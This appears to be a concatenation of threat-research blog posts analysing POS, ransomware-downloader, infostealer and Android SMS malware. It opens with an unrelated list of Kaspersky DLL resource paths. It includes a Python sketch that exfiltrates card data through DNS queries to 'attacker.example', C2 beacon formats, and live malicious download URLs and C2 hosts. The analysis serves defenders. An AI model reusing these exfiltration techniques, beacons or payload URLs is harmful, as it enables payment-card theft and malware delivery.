res://Program%20Files\Kaspersky Lab\Kaspersky Internet Security 2011\avzkrnl.dll/#2/BBALL
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 2012\x86\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Internet Security 2012\x86\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x86\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Internet Security 2013\x86\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x86\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x86\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.0\x86\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\x86\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\x86\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Internet Security 15.0.1\x86\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 16.0.0\x86\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Internet Security 16.0.0\x86\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.2\x86\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Internet Security 15.0.2\x86\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Total Security 14.0.0\x86\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Total Security 14.0.0\x86\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Total Security 15.0.0\x86\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Total Security 15.0.0\x86\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Total Security 15.0.1\x86\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Total Security 15.0.1\x86\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Total Security 15.0.2\x86\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Total Security 15.0.2\x86\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Total Security 16.0.0\x86\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky Total Security 16.0.0\x86\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky PURE 2.0\x86\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky PURE 2.0\x86\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky PURE 3.0\x86\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky PURE 3.0\x86\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky CRYSTAL 3.0\x86\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky CRYSTAL 3.0\x86\mfc42.dll/#2/#26567
res://Program%20Files%20(x86)\Kaspersky Lab\Kaspersky PURE\mfc42.dll/#2/#26567
res://Program%20Files\Kaspersky Lab\Kaspersky PURE\mfc42.dll/#2/#26567

MULTIGRAIN – Point of Sale Attackers Make an Unhealthy Addition to the Pantry


FireEye recently discovered a new variant of a point of sale (POS) malware family known as NewPosThings. This variant, which we call “MULTIGRAIN”, consists largely of a subset of slightly modified code from NewPosThings. The variant is highly targeted, digitally signed, and exfiltrates stolen payment card data over DNS. The addition of DNS-based exfiltration is new for this malware family; however, other POS malware families such as BernhardPOS and FrameworkPOS have used this technique in the past.

Using DNS for data exfiltration provides several advantages to the attacker. Sensitive environments that process card data will often monitor, restrict, or entirely block the HTTP or FTP traffic often used for exfiltration in other environments. While these common internet protocols may be disabled within a restrictive card processing environment, DNS is still necessary to resolve hostnames within the corporate environment and is unlikely to be blocked.
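The general pattern of DNS-based exfiltration can be sketched in a few lines of Python. This is an illustrative example only: the domain and the single-label layout are hypothetical and do not reflect MULTIGRAIN's actual scheme. The key idea is that encoded data rides in the leftmost label of a DNS query name, which recursive resolvers will forward to the attacker's authoritative name server even when HTTP and FTP egress is blocked.

```python
import base64

def build_exfil_query(data: bytes, domain: str = "attacker.example") -> str:
    """Encode stolen data as the leftmost label of a DNS query name.

    DNS labels are limited to 63 bytes, so the payload is Base32-encoded
    (DNS names are case-insensitive, which rules out Base64) and must fit
    a single label in this sketch.
    """
    label = base64.b32encode(data).decode().rstrip("=").lower()
    assert len(label) <= 63, "payload too large for a single DNS label"
    return f"{label}.{domain}"

# The attacker's authoritative server simply logs the label from the
# incoming query instead of answering it meaningfully.
qname = build_exfil_query(b"4111111111111111=2005")
```

The actual exfiltration query format used by MULTIGRAIN is described later in the post (Figure 3).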

Specific Targeting

Several POS malware families will parse through running processes and scrape a large number of them in the hopes of locating card data. In contrast to that approach, MULTIGRAIN has been custom-engineered to target a specific point of sale process: multi.exe, associated with a popular back-end card authorization and POS (electronic draft capture) server software package. If multi.exe is not found on the infected host, the malware will not install and will simply delete itself. This shows that while developing or building their malware, the attackers had a very specific knowledge of the target environment and knew this process would be running.

Persistence

If the targeted POS process is running on the host and the malware is executed with a command line parameter designating “installation mode”, MULTIGRAIN copies itself to the hardcoded location “c:\windows\wme.exe” and installs a service with the properties shown in Figure 1.

Figure 1: Service properties used by MULTIGRAIN POS malware

Initial Beaconing

The malware collects the volume serial number and part of the MAC address and creates a hash of the concatenated value using the DJB2 hashing algorithm. The resulting hash is then combined with the computer name and a version number and all three components are then encoded with a custom Base32 encoding algorithm. The malware then makes a DNS query with this information to a hardcoded domain, notifying the attacker of a successful installation. The process is shown in Figure 2.
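The DJB2 algorithm mentioned above is a well-known published string hash. A minimal Python sketch is shown below; the 5381 seed and multiply-by-33 step are the standard variant, and the input shown is a placeholder, not taken from a real infection:

```python
def djb2(data: bytes) -> int:
    """Classic DJB2 hash: h = h * 33 + byte, starting from seed 5381."""
    h = 5381
    for b in data:
        h = (h * 33 + b) & 0xFFFFFFFF  # keep the value 32-bit
    return h

# MULTIGRAIN hashes the volume serial number concatenated with part of
# the MAC address; this input is a placeholder for illustration.
machine_id = djb2(b"1234ABCD-00:11:22")
```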

Figure 2. Construction of Installation Beacon

Memory-Scraping and Card Data Exfiltration

Once installed and executing, MULTIGRAIN begins scraping the memory of the targeted process for Track 2 card data, validating that data using the Luhn algorithm. Track 2 data normally contains the PAN (Primary Account Number), expiration date, service code and, optionally, a CVV/CVC number. This data is typically sufficient to attempt “card-present” and, in some cases, “card-not-present” fraud.
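The Luhn check referenced above is a standard mod-10 checksum used to weed out false positives when scraping memory for PANs. A straightforward implementation:

```python
def luhn_valid(pan: str) -> bool:
    """Return True if the digit string passes the Luhn mod-10 check."""
    digits = [int(c) for c in pan]
    total = 0
    # Double every second digit, counting from the right; digits that
    # exceed 9 have 9 subtracted (equivalent to summing their digits).
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

# The well-known test PAN 4111111111111111 passes; altering one digit fails.
```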

Each Track 2 record is first encrypted with a 1024-bit RSA public key, pushed through the same custom Base32 encoding process as used in the installation beacon, and then stored in a buffer. Every five minutes, the malware checks this buffer to see if any card data is ready for exfiltration. If card data is present, the individual encrypted and encoded Track 2 data record for each card is sent over the network by means of a DNS query made by the malware. The process is shown in Figure 3.

Figure 3. Track 2 Card Data Encoding and Exfiltration

Base32 Encoding

Both the installation beacon and the stolen card data are encoded with an unusual encoding algorithm – Base32 – before being transmitted via DNS queries. The choice of Base32 is interesting as Base64 is better known and more widely used (for instance in the MIME standard used by email attachments). Using Base32 will actually result in the data taking up 20 percent more space than Base64, so the attackers were unconcerned with the efficiency of bandwidth.

One possible reason for selecting Base32 is the relative obscurity of the algorithm. Security and data loss prevention (DLP) products are more likely to detect Base64 encoding and in some cases can automatically decode the data, which could result in DLP devices identifying the exfiltration.
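The 20 percent figure can be verified with Python's standard library: Base64 expands data by a factor of 4/3, while Base32 expands it by 8/5, so for the same input the Base32 output is exactly 1.2 times the size of the Base64 output:

```python
import base64

payload = b"\x00" * 60           # 60 raw bytes (a multiple of both 3 and 5)
b64 = base64.b64encode(payload)  # 60 * 4/3 = 80 bytes
b32 = base64.b32encode(payload)  # 60 * 8/5 = 96 bytes

overhead = len(b32) / len(b64)   # 96 / 80 = 1.2, i.e. 20% larger
```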

Code Reuse

Elements of the code from MULTIGRAIN show strong similarities to the POS malware family known as NewPosThings. Shared code elements include:

  • The code used to scrape a process for card data
  • The DJB2 hashing algorithm used as part of creating a system ID

Two other examples from binary disassembly are shown below: the “connect/3” network beacon (Figure 4 – seemingly unused in MULTIGRAIN) and similarities in the construction of the installation beacon (Figure 5).

Figure 4. “Connect/3” network beacon comparison between MULTIGRAIN and NewPosThings

Figure 5. Installation beacon comparison between MULTIGRAIN and NewPosThings

Digital Signature

As shown in Figure 6, this MULTIGRAIN sample is digitally signed with a certificate issued to the “AMO-K Limited Liability Company” with a Comodo root and intermediate certificate chain (serial number d0 8d 83 ff 11 8d f3 77 7e 37 1c 5c 48 2c ce 7b). The certificate was revoked on Oct. 14, 2015.

Figure 6: Digital certificate used to sign MULTIGRAIN sample

Conclusion

Organizations that process card data must remain vigilant against attackers intent on financial fraud. Many POS malware families are written to be fairly generic (for example, targeting any process that may contain payment card data). However, threat actors may operate with greater stealth, customizing malware for specific environments and using less common protocols or methods for data exfiltration.

Although MULTIGRAIN does not bring any new capabilities to the POS malware table, it does show that capable attackers can customize malware “on-the-fly” to target a specific environment. While exfiltration via DNS is not a new tactic, MULTIGRAIN demonstrates that organizations should monitor and review DNS traffic for suspicious or anomalous behavior.

MD5:

F924CEC68BE776E41726EE765F469D50

This post was first available on Visa Threat Intelligence, the first product available from the partnership between Visa Inc. and FireEye. Subscribers gain access to a powerful web portal that distills the latest proprietary cyber intelligence relevant to payment systems into actionable information, including timely alerts on malicious actors, methods, trends in cyber attacks, and in-depth forensic analysis from recent data breaches. Contact your Visa Account Executive or email VisaThreatIntelligence@Visa.com for more information.

Follow The Money: Dissecting the Operations of the Cyber Crime Group FIN6


Cybercrime operations can be intricate and elaborate, with careful planning needed to navigate the various obstacles separating an attacker from a payout. Yet reports on these operations are often fragmentary, as the full scope of attacker activity typically occurs beyond the view of any one group of investigators.

FireEye Threat Intelligence and iSIGHT Partners recently combined our research to provide a unique and extensive look into the activities of one particular threat group: FIN6.

FIN6 is a cyber criminal group that steals payment card data for monetization from targets predominately in the hospitality and retail sectors. The group was observed aggressively targeting and compromising point-of-sale (POS) systems and making off with millions of payment card numbers. These card numbers were later sold on a particular underground “card shop,” potentially earning FIN6 hundreds of millions of dollars.

This report provides wide-ranging, end-to-end visibility into FIN6’s cybercrime operations, detailing initial intrusion, methods used to navigate the victim network, other tactics, techniques, and procedures (TTPs), and the sale of stolen payment card data in an underground marketplace.

The story of FIN6 shows how real-world threat actors operate.

Please join us for a webinar on Thursday, May 5 at 11:00am ET/8:00am PT. You can register here.

The video below offers an overview of the methods FIN6 uses.

New Downloader for Locky


Through analysis of Dynamic Threat Intelligence (DTI) data, we have observed the recent rise of the Locky malware. Locky is ransomware that is aggressively distributed via downloaders attached to spam emails, and it may have surpassed the Dridex banking trojan in popularity. In previous campaigns, the ransomware was downloaded by a macro-based downloader or a JavaScript downloader. However, in April 2016, FireEye Labs observed a new development in the way this ransomware is downloaded onto a compromised system.

In a recent Locky spam campaign using ‘Photos’ as a theme (Figure 1), we saw a new binary being downloaded by the JavaScript found in the attached ZIP file, as seen in Figure 2. This JavaScript downloader reached out to “hxxp://mrsweeter.ru/87h78rf33g”.

Figure 1: Recent Locky spam campaign

Figure 2. Locky spam ZIP attachment containing JS downloader

New Downloader (MD5: c5ad81d8d986c92f90d0462bc06ac9c6)

The new downloader has a custom network communication protocol. In our tests, it only downloads the Locky ransomware as its payload. This malware seems to be in an early development stage, as it only supports commands for downloading and executing an executable and for deleting itself. Because the malware can also update its own binary, more commands may be supported in the future.

The malware communicates with its command and control (C2) over HTTP using a custom encryption algorithm. The first beacon to the hard-coded C2 asks for a task to be executed by the malware. An example of the unencrypted message sent to C2 is formatted, as shown in Figure 3.

Figure 3. Raw message format

ID1 – derived from HDD Volume Serial Number
ID2 – 2222222222 (hard-coded value)
ID3 – random generated number
ID4 – derived from bit-masked OS version and system architecture
time – UTC time the message is created
type – getjob (hard-coded value)
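The exact raw layout of this message appears in Figure 3. The sketch below simply assembles the listed fields into a key/value string; the `&key=value` separators and the field names are assumptions for illustration, not the downloader's actual format:

```python
import random
import time

def build_beacon(volume_serial: int, os_field: int) -> str:
    """Assemble a 'getjob' beacon from the fields listed above.

    The '&key=value' layout is an assumption for illustration; the real
    separator and ordering are defined by the malware (Figure 3).
    """
    fields = {
        "id1": volume_serial,                 # derived from HDD volume serial number
        "id2": 2222222222,                    # hard-coded value
        "id3": random.randint(0, 2**32 - 1),  # randomly generated number
        "id4": os_field,                      # bit-masked OS version and architecture
        "time": int(time.time()),             # UTC time the message is created
        "type": "getjob",                     # hard-coded value
    }
    return "&".join(f"{k}={v}" for k, v in fields.items())
```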

This beacon string is encrypted with the custom algorithm shown in Figure 4 before sending it to its C2. The custom encryption is composed of XOR and bit shifts.

Figure 4. Custom string encryption
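As an illustration of what a combined XOR-and-bit-shift stream transform can look like, here is a hypothetical, reversible variant. The constants and keystream structure are invented for demonstration and do not match the downloader's real routine shown in Figure 4:

```python
def xor_shift_encrypt(data: bytes, key: int = 0x1D) -> bytes:
    """Toy stream cipher: evolve a byte-wide state with shifts, XOR it in."""
    out = bytearray()
    state = key
    for b in data:
        out.append(b ^ state)
        # Evolve the keystream with an 8-bit rotate and XOR (invented constants).
        state = ((state << 3) | (state >> 5)) & 0xFF
        state ^= 0x5A
    return bytes(out)

def xor_shift_decrypt(data: bytes, key: int = 0x1D) -> bytes:
    """XOR with the same keystream reverses the transform."""
    return xor_shift_encrypt(data, key)
```

Because the keystream depends only on the key, applying the routine twice recovers the plaintext, which is why a single Python function can serve as both encryptor and decryptor (as with the decryptor in Figure 6).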

After encryption, an ‘A’ (0x41) character is appended to the encrypted message. The beacon request is delivered via an HTTP POST request. In this sample, it reaches out to hxxp://raprockacademy.com/api, as shown in Figure 5.

Figure 5. Encrypted HTTP POST request and C2 response

The C2 server responds with an encrypted message that tells the malware what action to take. Decrypting the C2 response is possible with the Python code shown in Figure 6.

Figure 6. C2 response decryptor

The decrypted message contains a URL from which to download a binary; in this case, an updated Locky binary.

Figure 7. Decrypted message

The ‘command’ field can be ‘UPDATE’, ‘NOTASKS’, or ‘DEL’: ‘NOTASKS’ means there are no further instructions from the C2 for the moment, and ‘DEL’ instructs the downloader to delete itself from the victim machine by dropping and executing a batch file.

Further inspection of this malware reveals several small DLL files embedded in the binary. These DLLs may be used depending on the OS environment of the compromised system. The following is a brief description of the embedded DLLs:

1.  32-bit and 64-bit DLLs that execute a file via the CreateProcessW API.
2.  A 64-bit binary used for bypassing User Account Control (UAC). The debug symbol path is not stripped from the binary:
            D:\Test\Build\AvoidUAC\x64\Release\Test64Shellcode.pdb
3.  A 64-bit binary that can elevate privileges for a specified process.

Locky DGA update

The Locky sample downloaded (MD5: 357c162a35c3623d1a1791c18e9f56e7) has updated its DGA. The DGA has the following differences:

  • TLD is not randomly generated and is picked from the following list: ["ru", "info", "biz", "click", "su", "work", "pl", "org", "pw", "xyz"]
  • Constant 0x2709a354 is no longer used
  • Introduced new constants: 0x1bf5, 0xd8efffff, 0x65cad
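The updated DGA code itself is shown in Figure 8. As a hedged sketch of the first bullet only, here is how a seed could index into the hard-coded TLD list; the modulo scheme is an assumption for illustration, not Locky's actual index computation:

```python
TLDS = ["ru", "info", "biz", "click", "su", "work", "pl", "org", "pw", "xyz"]

def pick_tld(seed: int) -> str:
    """Select a TLD from the hard-coded list.

    The modulo indexing here is an illustrative assumption; the real DGA
    derives its index from the seed/date math shown in Figure 8.
    """
    return TLDS[seed % len(TLDS)]

# A seed computed elsewhere in the DGA selects one of the ten TLDs;
# the label ("example") is a placeholder, not a generated domain.
domain = "example." + pick_tld(0x65cad)
```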

We provide an update to the shared DGA code from our previous blog, as shown in Figure 8.

Figure 8. Updated Locky Domain Generation Algorithm

Conclusion

The actors behind the Locky ransomware are actively seeking new ways to install their malware on victim computers, which may be why this new downloader was introduced into the current distribution framework. The downloader could also serve as a platform for installing other malware (“pay-per-install”).

IoCs

Spam EML

  • 7b45833d87d8bd38c44cbaeece65dbbd04e12b8c1ef81a383cf7f0fce9832660
  • 9a0788ba4e0666e082e18d61fad0fa9d985e1c3223f910a50ec3834ba44cce10

MD5s

  • b0ca8c5881c1d27684c23db7a88d11e1
  • c5ad81d8d986c92f90d0462bc06ac9c6
  • ebf1f8951ec79f2e6bf40e6981c7dbfc
  • 357c162a35c3623d1a1791c18e9f56e7
  • 2bcd76f6ef9f4cbcf5952f62b9bc8a08
  • c325dcf4c6c1e2b62a7c5b1245985083

URLs

  • mrsweeter.ru/87h78rf33g
  • 185.130.7.22/files/sBpFSa.exe
  • 185.130.7.22/files/WRwe3X.exe
  • slater.chat.ru/gvtg77996
  • hundeschulegoerg.de/gvtg77996
  • buhjolk.at/files/dIseJh.exe
  • buhjolk.at/files/aY5TFn.exe

PowerShell used for spreading Trojan.Laziok through Google Docs

Introduction

Through our multi-flow detection capability, we recently identified malicious actors spreading Trojan.Laziok malware via Google Docs. We observed that the attackers managed to upload the payload to Google Docs in March 2016. During the brief time it was live, users accessing the malicious page from Internet Explorer (versions 3 to 11) would have become the unwilling hosts for the infostealer payload without any security warning. After we alerted Google about its presence, they quickly cleaned it and the original URL involved in propagation also went down.

The Payload

Trojan.Laziok reportedly serves as a reconnaissance tool that attackers use to collect information about systems they have compromised. It has been seen previously in a cyber espionage campaign targeting the energy sector, particularly in the Middle East[i]. In that campaign, the malware was spread using spam emails with malicious attachments exploiting the CVE-2012-0158 vulnerability.

The techniques used for delivery in this case involve exploiting users running versions of Internet Explorer that support VBScript.

Attack Delivery Point

The attacker stored the first stage of the attack on the Polish domain hosting site cba[.]pl. As seen in Figure 1, the first stage initiates the attack by running obfuscated JavaScript from www.younglean.cba[.]pl/lean/.

Figure 1. Obfuscated code shown in the response

Once decoded, the JavaScript unpacks and exploits CVE-2014-6332 through VBScript execution in Internet Explorer (versions 3 to 11). This memory corruption vulnerability in Windows Object Linking and Embedding (OLE) Automation allows attackers to bypass operating system security utilities and other protections and enter the “GodMode” function. CVE-2014-6332 exploitation combined with GodMode privilege abuse has been in use since late 2014 via a known PoC[ii], as seen in Figures 2a and 2b:

Figure 2a. CVE-2014-6332 usage

Figure 2b. Function call to runmumaa() after “GodMode” access changing the safemode flags

Next, the runmumaa() function downloads the malicious payload from Google Docs through PowerShell. PowerShell is used to download the malware and execute it inside the path defined by the %APPDATA% environment variable via DownloadFile and ShellExecute commands. All VBScript instructions and PowerShell scripts are part of the obfuscated script inside document.write(unescape), shown in Figure 1.

PowerShell is also useful for bypassing anti-virus software because it is able to inject payloads directly in memory. We have previously discussed active PowerShell data stealing campaigns from Russia[iii]. It seems the technique is still popular among campaigns involving infostealers, and this one was able to evade Google Docs security checks. The payload download link from Google Docs – seen in Figure 3 showing the de-obfuscated code – fetched live malware for victims who ended up on the aforementioned Polish website.

Figure 3. Using PowerShell to fetch payload hosted on Google docs link

Payload Details

The downloaded payload is infostealer Trojan.Laziok, as evidenced by its callback trace and the presence of the following data:

00406471 PUSH 21279964.00414EED ASCII "open"
0040649C MOV EDX,21279964.004166A8 ASCII "idcontact.php?COMPUTER="
004064B1 MOV EDX,21279964.00415D6D ASCII "&steam="
004064D2 MOV EDX,21279964.00416D96 ASCII "&origin="
004064F3 MOV EDX,21279964.00416659 ASCII "&webnavig="
00406514 MOV EDX,21279964.00416B17 ASCII "&java="
00406535 MOV EDX,21279964.00415601 ASCII "&net="
00406556 MOV EDX,21279964.00414F76 ASCII "&memoireRAMbytes="
0040656B MOV EDX,21279964.0041628C ASCII "&diskhard="
0040658E MOV EDX,21279964.00414277 ASCII "&avname="
004065AF MOV EDX,21279964.00416BFC ASCII "&parefire="
004065D0 MOV EDX,21279964.0041474A ASCII "&install="
004065E5 MOV EDX,21279964.00414E12 ASCII "&gpu="
00406606 MOV EDX,21279964.004164B7 ASCII "&cpu="
00406659 MOV EDX,21279964.004170F9 ASCII "bkill.php"
004066B9 MOV EDX,21279964.00415B79 ASCII "0000025C00000C6B000008BB000006ED0000088900000453000004CE0000054100000B75"
004066ED MOV EDX,21279964.004149CD ASCII "install_info.php"
00406735 MOV EDX,21279964.00415951 ASCII "pinginfo.php"
00406772 MOV EDX,21279964.00416B6B ASCII "get.php?IP="
00406787 MOV EDX,21279964.0041463F ASCII "&COMPUTER="
0040679C MOV EDX,21279964.00416DF5 ASCII "&OS="
004067B1 MOV EDX,21279964.00415CB8 ASCII "&COUNTRY="
004067C6 MOV EDX,21279964.00416069 ASCII "&HWID="
004067DB MOV EDX,21279964.00414740 ASCII "&INSTALL="
004067F0 MOV EDX,21279964.00415BE3 ASCII "&PING="
00406805 MOV EDX,21279964.004158E2 ASCII "&INSTAL="
0040681A MOV EDX,21279964.00414D3E ASCII "&V="
0040682F MOV EDX,21279964.00414E5D ASCII "&Arch="
00406872 MOV EDX,21279964.00414166 ASCII "post.php"
00406899 MOV EDX,21279964.00414EB0 ASCII "*0"

The above instructions from the unpacked payload highlight the typical traits of Trojan.Laziok. The infostealer tries to collect information about the computer name, CPU details, RAM size, location (country), and installed software and antivirus (AV). Our MVX engine also shows that it attempts to access popular AV files, such as installer files for Kaspersky, McAfee, Symantec and Bitdefender. It also blends in by copying itself to well-known folders and process names, such as:

C:\Documents and Settings\admin\Application Data\System\Oracle\smss.exe

The payload attempts to call back to a known bad Polish server: hxxp://193.189.117[.]36.

We observed the first instance of this attack on March 13, 2016. The malware was available on Google Docs until we alerted Google about its presence. Users are not usually able to download malicious content from Google Docs because Google actively scans and blocks malicious content. The fact that this sample was available and downloadable on Google Docs suggests that the malware evaded Google’s security checks. Following our notification, Google promptly removed the malicious file and it can no longer be fetched.

Conclusion

FireEye’s multi-flow detection mechanism catches this attack at every level, from the point of entry to the callback, and the malware is not able to bypass FireEye sandbox security. PowerShell data stealing campaigns have also been observed spreading through document files with embedded macros, so corporate environments need to be extra careful about the policy and regulation of PowerShell usage, especially since the abuse can involve trusted sources that sometimes have exemptions (whitelists from some security vendors being one example). Or they can keep using FireEye.

[i] http://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector
[ii] http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/
[iii] https://www.fireeye.com/blog/threat-research/2015/12/uncovering_activepower.html

RuMMS: The Latest Family of Android Malware Attacking Users in Russia Via SMS Phishing

Introduction

Recently we observed an Android malware family being used to attack users in Russia. The malware samples were mainly distributed through a series of malicious subdomains registered under a legitimate domain belonging to a well-known shared hosting service provider in Russia. Because all the URLs used in this campaign have the form of hxxp://yyyyyyyy[.]XXXX.ru/mms.apk (where XXXX.ru represents the hosting provider’s domain), we named this malware family RuMMS.

To lure the victims to download the malware, threat actors use SMS phishing – sending a short SMS message containing a malicious URL to the potential victims. Unwary users who click the seemingly innocuous link will have their device infected with RuMMS malware. Figure 1 describes this infection process and the main behaviors of RuMMS.

Figure 1. Overview of the RuMMS campaign and behaviors

On April 3, 2016, we still observed new RuMMS samples emerging in the wild. The earliest identified sample, however, can be traced back to Jan. 18, 2016. Within this time period, we identified close to 300 samples belonging to this family (all sample hashes are listed in the Appendix).

After landing on the victim’s phone, the RuMMS apps will request device administrator privileges, remove their icons to hide themselves from users, and remain running in the background to perform a series of malicious behaviors. So far we have identified the following behaviors:

  • Sending device information to a remote command and control (C2) server.
  • Contacting the C2 server for instructions.
  • Sending SMS messages to financial institutions to query account balances.
  • Uploading any incoming SMS messages (including the balance inquiry results) to the remote C2 server.
  • Sending C2-specified SMS messages to phone numbers in the victim’s contacts.
  • Forwarding incoming phone calls to intercept voice-based two-factor authentication.

Each of these behaviors is under the control of the remote C2 server. In other words, the C2 server can specify the message contents to be sent, the time period in which to forward the voice call, and the recipients of outgoing messages. As part of our investigation into this malware, we emulated an infected Android device in order to communicate with the RuMMS C2 server. During one session, the C2 server commanded our emulated device to send four different SMS messages to four different phone numbers, all of which were associated with Russian financial institutions. At least three of the messages were intended to check a user’s account balance at the institution (we could not confirm the purpose of the fourth). Through additional research, we identified several forum posts where victims complained that funds (up to 600 rubles) were transferred out of their accounts after RuMMS infected their phones.

We do not know exactly how many people have been infected with RuMMS malware. However, our data suggests that there have been at least 2,729 infections between January 2016 and early April 2016, with a peak in March of more than 1,100 infections.

Smishing: The Major Way To Distribute RuMMS

We have not observed any instances of RuMMS on Google Play or other online app stores. Smishing (SMS phishing) is currently the primary way threat actors are distributing the malware. The process starts when an SMS phishing message arrives at a user’s phone. The message translates roughly to: “You got a photo in MMS format: hxxp://yyyyyyyy.XXXX.ru/mms.apk.”

So far, we have identified seven different URLs being used to spread RuMMS in the wild. All of the URLs reference the file “mms.apk” and all use the domain “XXXX.ru”, which belongs to a top-five shared hosting platform in Russia (the domain itself has been obfuscated to anonymize the provider).

The threat actors registered at least seven subdomains through the hosting provider, each consisting of eight random-looking characters (asdfgjcr, cacama18, cacamadf, konkonq2, mmsmtsh5, riveroer, and sdfkjhl2.) As of this writing, no files were hosted at any of the links. The threat actors seem to have abandoned these URLs and might be looking into other ways to reach more victims.

Use of a shared hosting service to distribute malware is highly flexible and low cost for the threat actors. It is also much harder for network defenders or researchers to track a campaign where the infrastructure is a moving target. Many top providers in Russia offer cheap prices for their shared hosting services, and some even provide free 30-day trial periods. Threat actors can register subdomains through the hosting provider and use the provider’s services for a short-period campaign. A few days later they can cancel the trial and do not need to pay a penny. In addition, these out-of-the-box hosting services usually provide better infrastructure than the attackers could manage to construct (or compromise) themselves.

RuMMS Code Analysis

All RuMMS samples share the same behaviors, major parts of which are shown in Figure 1. However, the underlying code can be quite different in that various obfuscation mechanisms were adopted to evade detection by anti-virus tools. We used a sample app named “org.starsizew” with an MD5 of d8caad151e07025fdbf5f3c26e3ceaff to analyze RuMMS’s code.

Several of the main components of RuMMS are shown in Figure 2. The activity class “org.starsizew.MainActivity” executes when the app is started. It first starts another activity defined in “org.starsizew.Aa” to request device administrator privileges, and then calls the following API of “android.content.pm.PackageManager” (the Android package manager) to remove its own icon from the home screen in order to conceal the existence of RuMMS from the user:

            setComponentEnabledSetting(MainActivity.class, 2, 1)

At the same time, “org.starsizew.MainActivity” starts the main service as defined in “org.starsizew.Tb”, and uses a few mechanisms to keep the main service running continuously in the background. The class “org.starsizew.Ac” is designed for this purpose; its only task is to check whether the main service is running, and to restart it if it is not. The class “org.starsizew.Tb” also has a self-monitoring mechanism that restarts itself when its own onDestroy API is triggered. Beyond that, its major functionality is to collect private device information, upload it to a remote C2 server, and handle any commands requested by the C2 server. All of those functions are implemented as asynchronous tasks by “org.starsizew.i”.

Figure 2. Android Manifest File of RuMMS

The class “org.starsizew.Ma” is registered to intercept incoming SMS messages, the arrival of which will trigger the Android system to call its “onReceive” API. Its major functionality is also implemented through the call of the asynchronous task (“org.starsizew.i”), including uploading the incoming SMS messages to the remote C2 server and executing any commands as instructed by the remote attacker.

C2 Communication

The C2 communication includes two parts: sending information to the remote HTTP server and parsing the server’s response to execute any commands as instructed by the remote attackers. The functionality for these two parts is implemented by doInBackground and onPostExecute respectively, two API methods of “android.os.AsyncTask” as extended by class “org.starsizew.i”.

Figure 3. Method doInBackground: to send information to remote C2 server

As seen from the major code body of method doInBackground shown in Figure 3 (some of the original classes and methods are renamed for easier understanding), there are three calls to HttpPost with different contents as parameters. At line 5, local variable v4 specifies the first parameter url, which can be changed by the remote C2 server later. These URLs are all in the form of “http://$C2.$SERVER.$IP/api/?id=$NUM”. The second parameter is a constant string “POST”, and the third parameter is a series of key-value pairs to be sent, assembled at runtime. The value of the first item, whose key is “method” (line 7), indicates the type of the contents: install, info and sms.

The first type of content, starting with “method=install”, will be sent when the app is started for the first time, including the following device private information:

  • Victim identifier
  • Network operator
  • Device model
  • Device OS version
  • Phone number
  • Device identifier
  • App version
  • Country

Figure 4 is an example of this string as seen by the FireEye Mobile Threat Prevention platform.

Figure 4. Example HTTP post message

The second type of information will be sent periodically to indicate that the device is alive. It has only two parts: the method field, set to “info”, and the victim identifier. The third type of information will be sent when RuMMS intercepts any SMS messages, including the balance inquiry results returned by a financial service’s SMS short code.
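The check-in traffic described above amounts to a plain HTTP form body of key-value pairs. The following Python sketch is illustrative only: the field names and values are placeholders inferred from the description, not the exact RuMMS wire format, and no request is actually sent.

```python
from urllib.parse import urlencode

# Illustrative sketch of the check-in body an emulated victim might build;
# field names and values are placeholders, not the exact RuMMS format.
def build_checkin(method, victim_id, extra=None):
    body = {'method': method, 'id': victim_id}
    body.update(extra or {})
    return urlencode(body)

# First-run "install" check-in carries (fake) device information
install = build_checkin('install', '12345', {
    'operator': 'ExampleTel',
    'model': 'EmulatedDevice',
    'os': '4.4.2',
})

# The periodic "info" keep-alive carries only the method and victim identifier
info = build_checkin('info', '12345')

print(install)
print(info)
```

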